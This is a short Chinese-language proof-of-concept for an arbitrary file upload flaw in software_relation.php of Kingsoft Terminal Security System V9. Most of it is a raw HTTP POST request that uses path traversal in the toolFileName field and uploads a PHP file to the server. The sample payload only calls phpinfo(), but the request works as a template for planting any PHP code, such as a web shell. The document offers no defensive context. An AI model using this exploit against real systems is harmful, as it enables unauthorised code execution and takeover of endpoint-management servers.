金山终端安全系统V9software_relation.php任意文件上传漏洞

POC

需要注意的是 toolFileName 参数必须为一个已经存在的文件，根目录下有很多文件可供选择

POST /inter/software_relation.php HTTP/1.1
Host: 192.168.86.128:6868
User-Agent: insomnia/2021.3.0
Cookie: SKYLARa0aede9e785feabae789c6e03d=0dii85n3v7bh0ct4se9jckmee0
Content-Type: multipart/form-data; boundary=X-INSOMNIA-BOUNDARY
Accept: */*
Content-Length: 594
Connection: close

--X-INSOMNIA-BOUNDARY
Content-Disposition: form-data; name="toolFileName"

../../phpinfo.php
--X-INSOMNIA-BOUNDARY
Content-Disposition: form-data; name="toolName"

123.php
--X-INSOMNIA-BOUNDARY
Content-Disposition: form-data; name="version"

1
--X-INSOMNIA-BOUNDARY
Content-Disposition: form-data; name="toolDescri"

1
--X-INSOMNIA-BOUNDARY
Content-Disposition: form-data; name="fileSize"

1
--X-INSOMNIA-BOUNDARY
Content-Disposition: form-data; name="toolImage"; filename="info.php"
Content-Type: application/x-httpd-php

<?php
 phpinfo();?>
--X-INSOMNIA-BOUNDARY--

POC​

POC